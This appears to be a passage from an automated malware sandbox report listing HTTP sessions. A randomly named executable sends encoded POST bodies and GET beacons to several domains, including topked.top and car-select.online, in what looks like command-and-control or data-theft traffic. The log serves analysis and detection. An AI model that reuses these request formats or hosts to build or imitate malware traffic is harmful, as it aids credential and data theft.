                                                                                                    Data Raw: 47 62 3d 61 4c 44 4b 58 2f 63 77 38 57 79 4c 55 56 75 76 70 2b 4e 42 55 48 79 55 4e 69 76 70 55 33 73 77 5a 59 2f 55 54 6e 6f 61 63 34 31 4d 2b 4e 67 51 4f 51 36 78 6a 32 53 67 63 30 36 65 79 4f 44 66 76 44 54 2f 34 51 35 5a 6b 6e 35 6b 4e 65 47 44 42 77 30 49 54 46 49 6b 61 46 32 73 5a 2f 62 55 61 44 4c 73 72 65 44 57 32 58 72 51 71 63 57 31 71 6d 32 36 55 4f 52 4e 5a 45 66 70 5a 4b 2f 42 4f 58 30 70 4e 38 37 71 4d 4e 54 34 6d 39 35 4d 66 64 53 54 74 42 37 6e 67 64 53 4d 31 62 33 65 67 51 2f 36 61 5a 77 34 67 6a 70 6d 39 6d 37 68 68 34 6f 7a 6c 55 41 34 53 44 6d 73 6d 66 31 47 72 36 4f 48 42 56 62 4c 61 39 4a 4a 70 57 33 45 4f 70 33 7a 65 31 78 62 6d 48 65 78 46 64 70 4b 6f 36 54 50 53 73 71 32 67 56 5a 47 68 55 47 47 70 77 59 6a 58 58 51 33 76 79 58 45 32 53 77 32 51 35 6a 6d 65 72 35 49 31 44 35 4a 49 70 6b 4c 4c 73 58 4d 6d 46 39 4c 4a 50 56 35 59 43 7a 4a 58 46 50 50 71 42 6d 59 4d 6c 64 70 75 46 63 63 69 57 68 4e 4d 58 61 59 34 32 68 78 4b 6e 74 63 63 58 59 75 64 36 35 6d 39 5a 4a 35 52 58 71 [TRUNCATED]
                                                                                                    Data Ascii: Gb=aLDKX/cw8WyLUVuvp+NBUHyUNivpU3swZY/UTnoac41M+NgQOQ6xj2Sgc06eyODfvDT/4Q5Zkn5kNeGDBw0ITFIkaF2sZ/bUaDLsreDW2XrQqcW1qm26UORNZEfpZK/BOX0pN87qMNT4m95MfdSTtB7ngdSM1b3egQ/6aZw4gjpm9m7hh4ozlUA4SDmsmf1Gr6OHBVbLa9JJpW3EOp3ze1xbmHexFdpKo6TPSsq2gVZGhUGGpwYjXXQ3vyXE2Sw2Q5jmer5I1D5JIpkLLsXMmF9LJPV5YCzJXFPPqBmYMldpuFcciWhNMXaY42hxKntccXYud65m9ZJ5RXqXWJ13UwMvZXx6+GCcCHaIqcnMyvGAg4OjX5Fx7vPFhocGaiNRBdN369Ec8+Sa2i1KtD6YvpR5/GTEHgLryexEzrfuHycDvHc7WiasngBvIdDPxta15wxwt97fXQ31KSNAvlvFuLnGIEEcn4Kg9zE9090D5Zp9L0LadIeqwYxEmNvck0UKs/5Ox/YxxpgnpCRdOENl74dhMLhduRlngZU8nXjK0u7zHIjVueiSpmNNZYvyZF+LUDREMFzln8dGzbMO0IqNpfwUMJxdmLbLRBVTWon8yGqa0cVBmWQRoroqW1XxqeQ5DkroQjVnJqHtgs9lUn8CdVw8K6MZoSMNpEI5BuW3NfWZ6oOSyaD74BGQU3Q/71IqiQ6rrKLpupaw0fKtchmoQm+XZ4H527WO2XQkf6RF8w9sVRXxCBn+zORWH37zord0UQjBIcB5DuIVubaKy6JeuO8jgPXJM65iOgsYCzo1M7LIKbtQzfgPWC8kWBP2DW51x1PxUfsKuE++eQiX+81WtUwMihfUPN/+BQvJjFLjMwM2w5OToBoDrOXCnp3/91TdawyhYXFHL5U3QECuZC97Fv+NM5H6ZAhkTlruyFon4KA1tnpMs3KFzQ3NXcCxwsjsCSRhHbUY8R90dNaiUXRTTWzMMXkgGtQ9wGErQb7e4oEtCtbOS [TRUNCATED]
                                                                                                    Jan 22, 2025 07:52:25.224781036 CET375INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Wed, 22 Jan 2025 06:52:25 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Encoding: gzip
                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.44995231.31.196.17803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:27.080735922 CET407OUTGET /sps0/?Gb=XJrqUIwA9BqFEGe78vIBE0G+BWiiclUka5W/N1g8G7k0/aUxIXiyzXPqBkPj84XroFellg4Bg0NpGuCwGUgLHXcXTFz0fq2LYjTTks2wxyXck/mKrQqUMNQ=&c8h40=q8sx8pUX60 HTTP/1.1
                                                                                                    Host: www.car-select.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Jan 22, 2025 07:52:27.861141920 CET733INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Wed, 22 Jan 2025 06:52:27 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.449993192.64.118.221803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:33.246037960 CET660OUTPOST /g9qz/ HTTP/1.1
                                                                                                    Host: www.topked.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.topked.top
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 199
                                                                                                    Connection: close
                                                                                                    Referer: http://www.topked.top/g9qz/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 45 2f 45 78 6f 73 45 37 71 74 44 47 79 51 79 4f 46 51 47 63 74 76 72 35 4f 73 41 4e 71 4b 4c 66 46 35 48 69 30 49 38 34 45 4c 42 39 61 76 6a 2f 53 74 56 77 58 51 2b 47 6e 67 65 32 62 58 55 4e 37 62 61 6c 73 4a 33 57 79 6b 35 4f 47 34 59 61 39 4a 77 61 41 79 2f 55 6b 33 58 51 50 30 6e 2f 2b 61 4f 78 51 51 4f 4c 62 35 56 33 35 59 64 48 38 48 4d 53 54 2f 54 4d 68 55 70 6a 66 4d 42 5a 56 38 52 6b 4e 55 2f 33 5a 75 55 6c 74 76 4a 67 48 4b 47 34 6f 79 66 2f 70 64 59 64 47 67 4d 54 69 78 76 34 6a 59 6f 2f 30 6e 55 70 63 73 56 44 43 2f 6b 79 77 6b 77 49 63 63 42 6c 63 71 37 77 58 41 3d 3d
                                                                                                    Data Ascii: Gb=E/ExosE7qtDGyQyOFQGctvr5OsANqKLfF5Hi0I84ELB9avj/StVwXQ+Gnge2bXUN7balsJ3Wyk5OG4Ya9JwaAy/Uk3XQP0n/+aOxQQOLb5V35YdH8HMST/TMhUpjfMBZV8RkNU/3ZuUltvJgHKG4oyf/pdYdGgMTixv4jYo/0nUpcsVDC/kywkwIccBlcq7wXA==
                                                                                                    Jan 22, 2025 07:52:33.821521044 CET533INHTTP/1.1 404 Not Found
                                                                                                    Date: Wed, 22 Jan 2025 06:52:33 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.450010192.64.118.221803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:35.805321932 CET680OUTPOST /g9qz/ HTTP/1.1
                                                                                                    Host: www.topked.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.topked.top
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 219
                                                                                                    Connection: close
                                                                                                    Referer: http://www.topked.top/g9qz/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 45 2f 45 78 6f 73 45 37 71 74 44 47 30 44 71 4f 41 33 79 63 6c 76 72 36 4c 73 41 4e 7a 61 4b 57 46 35 44 69 30 4b 51 6f 45 35 6c 39 62 4b 50 2f 54 70 4a 77 45 67 2b 47 2f 51 65 7a 47 6e 55 45 37 61 6d 74 73 49 4c 57 79 6e 46 4f 47 36 51 61 36 36 5a 6f 52 79 2f 57 39 6e 58 53 4d 45 6e 2f 2b 61 4f 78 51 51 79 68 62 35 64 33 35 72 46 48 2f 6c 6f 52 65 66 54 4c 67 55 70 6a 4a 38 42 64 56 38 52 57 4e 51 32 71 5a 73 73 6c 74 74 42 67 47 66 6d 37 7a 69 66 6d 6d 39 5a 55 4c 6a 67 61 6b 55 6d 57 69 2b 73 71 32 6d 51 36 51 4b 59 5a 54 4f 46 6c 69 6b 55 37 42 62 49 52 52 70 47 35 4d 49 47 7a 42 63 63 72 41 76 4a 6d 58 51 55 59 55 6c 4b 53 47 69 4d 3d
                                                                                                    Data Ascii: Gb=E/ExosE7qtDG0DqOA3yclvr6LsANzaKWF5Di0KQoE5l9bKP/TpJwEg+G/QezGnUE7amtsILWynFOG6Qa66ZoRy/W9nXSMEn/+aOxQQyhb5d35rFH/loRefTLgUpjJ8BdV8RWNQ2qZsslttBgGfm7zifmm9ZULjgakUmWi+sq2mQ6QKYZTOFlikU7BbIRRpG5MIGzBccrAvJmXQUYUlKSGiM=
                                                                                                    Jan 22, 2025 07:52:36.396045923 CET533INHTTP/1.1 404 Not Found
                                                                                                    Date: Wed, 22 Jan 2025 06:52:36 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.450019192.64.118.221803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:38.348649025 CET10762OUTPOST /g9qz/ HTTP/1.1
                                                                                                    Host: www.topked.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.topked.top
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 10299
                                                                                                    Connection: close
                                                                                                    Referer: http://www.topked.top/g9qz/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 45 2f 45 78 6f 73 45 37 71 74 44 47 30 44 71 4f 41 33 79 63 6c 76 72 36 4c 73 41 4e 7a 61 4b 57 46 35 44 69 30 4b 51 6f 45 35 74 39 61 38 62 2f 53 49 4a 77 48 67 2b 47 32 77 65 79 47 6e 56 57 37 62 4f 70 73 49 48 47 79 68 42 4f 48 66 45 61 37 4c 5a 6f 59 79 2f 57 79 48 58 54 50 30 6e 71 2b 61 65 31 51 51 43 68 62 35 64 33 35 74 70 48 6f 6e 4d 52 63 66 54 4d 68 55 6f 73 66 4d 42 6c 56 34 30 6a 4e 51 36 36 59 63 4d 6c 74 4e 78 67 4c 4c 47 37 75 79 66 6b 6c 39 5a 4d 4c 6a 74 43 6b 55 53 77 69 2b 77 41 32 6d 6b 36 44 39 31 6a 4b 38 74 61 30 48 55 33 63 4c 49 45 4a 4f 32 6f 44 62 57 64 4f 2f 49 49 62 39 30 52 58 53 5a 32 4b 77 53 31 5a 48 68 35 70 7a 34 58 47 76 6c 38 2f 47 51 46 6b 2b 4d 32 69 49 53 64 50 6a 46 37 57 42 67 6c 74 47 54 58 34 30 4a 63 63 64 37 56 4c 57 32 6b 4f 2f 71 64 43 61 71 45 39 2b 48 67 56 44 73 5a 56 36 74 36 75 45 4d 78 6b 5a 79 4a 53 6a 6f 35 7a 33 74 63 5a 4f 54 57 66 51 45 37 77 77 47 6d 54 5a 53 57 67 31 38 71 4d 6d 49 37 76 6f 4e 5a 72 78 6a 4b 48 4d 70 41 46 72 38 [TRUNCATED]
                                                                                                    Data Ascii: Gb=E/ExosE7qtDG0DqOA3yclvr6LsANzaKWF5Di0KQoE5t9a8b/SIJwHg+G2weyGnVW7bOpsIHGyhBOHfEa7LZoYy/WyHXTP0nq+ae1QQChb5d35tpHonMRcfTMhUosfMBlV40jNQ66YcMltNxgLLG7uyfkl9ZMLjtCkUSwi+wA2mk6D91jK8ta0HU3cLIEJO2oDbWdO/IIb90RXSZ2KwS1ZHh5pz4XGvl8/GQFk+M2iISdPjF7WBgltGTX40Jccd7VLW2kO/qdCaqE9+HgVDsZV6t6uEMxkZyJSjo5z3tcZOTWfQE7wwGmTZSWg18qMmI7voNZrxjKHMpAFr8w27/vQ1eWAcv8z4x7X5DW1DtweHoVoaQfM1eDDN26AsJvmvRaKee3BLQIG/2vAkd6zWvuJ5pCuLwAzzVGUgMiOy380vThC1TlsukbhMO+G7x1VUGfWzhbNLFOcbrjfeMN+ROl3HCP0fQWYfk0jvVtbcszXT/DknvpSQAPbsLDmBzl2bBUqxSJPRn5PeosBCMZOzJCgocd+K4TMW6/5owFUY4GN7YlnWatlCgjwqepTXy/M1Z1LyLsIVzXP1koUmO2Hq+k1QApzNkD1/MJWOiSDA6QtvVBSBN9ll/NNaDg1eoXpQQLVSOpM2x2ysImjnubxVUK7L+lYZFGEreYzo9/T8uBPB6z929Op9G6JowRjMKpEGrDEwCoL8lRPqbrtQD1pLb1lev7agtun+kjwBOzMtUUKsVdjMviETeREXFIx0VbIRbFqG/VeKaxUOMxqOZAzVGsrzv9uYjklPLxRt9Pup527l9hW5a7oNYHb7PoOuFolHCELjEeHDQ5Mm7Xs5zWIx+69dzBW0clQqkaGljLBQTW462pEL5WWQfk/HctikaDrssuk+8pDS5W0L580L4VFFuUwDH+tUN9MqwSCxuM8aW9SxPsTdrKDP10kVr2iA+ESXtdM/QggEAQZK6Fh4dCXmIrL6uurwFtPdLgTVE77VWwS8BjR7r5w [TRUNCATED]
                                                                                                    Jan 22, 2025 07:52:39.036379099 CET533INHTTP/1.1 404 Not Found
                                                                                                    Date: Wed, 22 Jan 2025 06:52:38 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.450020192.64.118.221803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:40.889395952 CET400OUTGET /g9qz/?Gb=J9sRrZ4fqsb/1Q6DHg/horvKP/Y227PlctC80LIvBLslcKLdVtpBX2y3nBvKVl1xysCjrJ6Q3kV9G4g20t4jViulyCGdG0mz9ZyUbW3XLJR78Ll+mTUZduw=&c8h40=q8sx8pUX60 HTTP/1.1
                                                                                                    Host: www.topked.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Jan 22, 2025 07:52:41.485837936 CET548INHTTP/1.1 404 Not Found
                                                                                                    Date: Wed, 22 Jan 2025 06:52:41 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.45002113.248.169.48803484C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 22, 2025 07:52:46.558377028 CET684OUTPOST /5l58/ HTTP/1.1
                                                                                                    Host: www.autonomousrich.xyz
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US
                                                                                                    Origin: http://www.autonomousrich.xyz
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Content-Length: 199
                                                                                                    Connection: close
                                                                                                    Referer: http://www.autonomousrich.xyz/5l58/
                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                                                                                                    Data Raw: 47 62 3d 72 78 69 72 70 67 6f 73 47 54 4f 6d 6d 31 43 6b 52 45 68 77 4a 46 33 54 6c 47 69 46 33 65 4c 4f 33 59 61 59 6c 6a 55 55 6b 58 66 6f 53 4c 46 47 73 6a 56 72 47 32 73 6b 43 59 52 4d 2b 55 31 54 7a 4a 70 34 7a 78 76 46 54 79 42 57 33 56 54 64 6f 32 5a 67 2f 49 6b 74 53 33 78 74 33 6f 4b 55 4e 41 64 76 64 48 78 59 35 7a 46 6f 67 58 76 50 30 53 46 73 31 69 68 78 4d 72 76 4e 66 74 6f 71 36 52 68 51 70 44 4a 49 66 43 46 37 75 33 35 38 4c 54 78 5a 34 43 65 75 73 4c 39 37 77 63 2b 79 6f 57 59 78 51 47 4f 4d 6f 43 32 57 46 6a 4f 53 4e 62 4f 65 72 36 55 64 66 64 77 35 67 78 6b 74 5a 41 3d 3d
